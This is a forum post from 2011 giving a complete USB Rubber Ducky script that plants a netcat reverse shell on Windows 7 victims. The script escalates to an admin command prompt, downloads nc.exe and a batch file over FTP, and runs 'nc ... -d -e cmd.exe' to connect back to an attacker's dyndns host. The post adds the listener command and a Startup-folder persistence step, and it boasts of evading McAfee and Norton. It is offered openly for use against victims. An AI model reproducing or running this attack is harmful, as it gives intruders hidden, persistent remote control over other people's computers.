D0oM Posted November 3, 2011 Share Posted November 3, 2011 (edited) My Strictly Netcat Reverse Shell Ok this has a few requirements so it is not that user friendly but I like this method because after a few tests it has not been detected by any AV or other types of security programs. Works on Windows 7 The first requirement is an FTP server. All windows boxes include an ftp client by default thats what I will be using to download the nc.exe and startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this but good luck finding one. So you will probably have to run an FTP server yourself like I have done. So once you have an ftp server up and running download the windows version of netcat, unzip it and put the files into a directory called /tools/nc in the user your logging in with's root directory (you can always change my code so your ducky script will look in your specific directory you want it to for the nc files). Download the windows version of netcat here http://www.downloadnetcat.com/. Scroll down and select download netcat windows version. Now make a .bat file and add one line to it: start nc yourserver.dyndns.org 8080 -d -e cmd.exe Add that bat file to the same directory your netcat files are in. In my case /tools/nc Now on your attacking computer you must listen for the incoming connection with this command: nc -l -p 8080 Also remember to port forward port 8080 on your router to your internal listening attack computer! Now that you have everything set up you are ready to put the ducky into a victims computer anywhere in the world. The only thing that can stop this is if the victims network fro some reason blocks 8080 inc or outgoing. In that case just change the port number. Ive tested this on a few Windows 7 systems and it went undetected on all of them. Each one had anti virus such as Mcafee and Norton. Firewalls on as well. ESCAPE CONTROL ESCAPE DELAY 900 STRING cmd DELAY 900 MENU DELAY 900 STRING a DELAY 900 ENTER DELAY 1800 LEFTARROW DELAY 900 ENTER DELAY 900 STRING ftp ENTER DELAY 600 STRING open yourftpservernamehere.dyndns.org ENTER DELAY 900 STRING FtpUsernameHere ENTER DELAY 900 STRING YourFtpServersUsernamesPasswdHere DELAY 500 ENTER DELAY 1000 STRING cd tools ENTER DELAY 900 STRING cd nc DELAY 900 ENTER STRING mget * DELAY 800 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 900 ENTER DELAY 500 ENTER STRING quit ENTER DELAY 400 STRING start nc yourlisteningsevernamehere.dyndns.org 8080 -d -e cmd.exe ENTER DELAY 400 STRING exit ENTER Now once your inside the victims computer issue the command: move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" Now there computer will run your netcat reverse shell whenever it boots. You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent to the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt leaving less traces of the backdoor. So the only way the victim will see the backdoor is if they check things like task manager . Edited November 4, 2011 by D0oM Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.